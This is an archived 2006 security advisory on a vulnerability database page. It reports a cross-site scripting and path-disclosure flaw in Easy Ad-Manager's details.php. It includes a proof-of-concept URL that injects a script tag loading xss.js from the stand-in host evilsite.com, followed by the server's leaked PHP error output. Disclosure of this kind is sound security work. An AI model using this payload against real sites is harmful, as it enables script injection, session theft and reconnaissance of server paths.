Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13043
HistoryJun 09, 2006 - 12:00 a.m.

Easy Ad-Manager

2006-06-0900:00:00
vulners.com
8
JSON

Easy Ad-Manager v. (unknown, not listed on homepage)

Homepage:
http://www.scriptsez.net

Effected files:
details.php

XSS Vulnerability with full path disclosure:

http://www.example.com/eam/details.php?do=load&mbid=/<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>

Warning: fopen(stats//This is remote text via xss.js located at
evilsite.combanner_cookie=visited%3Bvisited%3B.vis):

failed to open stream: No such file or directory in /home/www/domainname/demo/eam/details.php on line
268

Warning: fwrite(): supplied argument is not a valid stream resource in
/home/www/domain/demo/eam/details.php on

line 269

Warning: fclose(): supplied argument is not a valid stream resource in
/home/www/domain/demo/eam/details.php on

line 270

Warning: Cannot modify header information - headers already sent by (output started at
/home/www/domain/demo/

eam/details.php:268) in /home/www/domain/demo/eam/details.php on line 272

JSON